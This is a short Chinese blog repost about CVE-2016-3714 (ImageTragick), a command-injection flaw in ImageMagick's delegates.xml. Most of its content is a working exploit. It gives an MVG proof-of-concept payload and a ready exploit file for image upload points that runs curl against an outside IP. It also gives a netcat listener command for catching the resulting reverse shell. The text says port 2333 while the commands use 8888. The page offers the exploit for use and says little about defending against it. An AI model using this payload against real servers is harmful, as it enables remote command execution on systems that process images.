CVE-2016-3714-ImageMagick 漏洞利用 - 走看看

zoukankan html css js c++ java

CVE-2016-3714-ImageMagick 漏洞利用
漏洞简介：/etc/ImageMagick/delegates.xml 将%s，%l加入到command里造成了命令执行

利用方式：

poc代码：
push graphic-context viewbox 0 0 640 480 fill 'url(https://"| command")' pop graphic-context
　　

图片上传点，抓包，附上exp代码：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

ip：你要反弹的shell地址，2333端口号，服务器监听反弹shell。
nc -lvp 8888
查看全文

相关阅读:
CSDN修改博客皮肤模板
 2015年第六届蓝桥杯C/C++ A组国赛 —— 第三题：显示二叉树
 2015年第六届蓝桥杯C/C++ A组国赛 —— 第三题：显示二叉树
 2015年第六届蓝桥杯C/C++ A组国赛 —— 第二题：四阶幻方
 2015年第六届蓝桥杯C/C++ A组国赛 —— 第二题：四阶幻方
 2015年第六届蓝桥杯C/C++ B组国赛 —— 第一题：积分之迷
 2015年第六届蓝桥杯C/C++ B组国赛 —— 第一题：积分之迷
 2014年第五届蓝桥杯C/C++ A组国赛 —— 第四题：排列序数
 2014年第五届蓝桥杯C/C++ A组国赛 —— 第四题：排列序数
 2014年第五届蓝桥杯C/C++ A组国赛 —— 第三题：日期差

原文地址：https://www.cnblogs.com/junsec/p/11166015.html

热门文章
魔咒词典 HDU
气温预测
 气温预测
 bzoj3555 企鹅QQ
bzoj3555 企鹅QQ
双hash板子
 双hash板子
 POJ 1200 Crazy Search
POJ 1200 Crazy Search
画画

Copyright © 2011-2022 走看看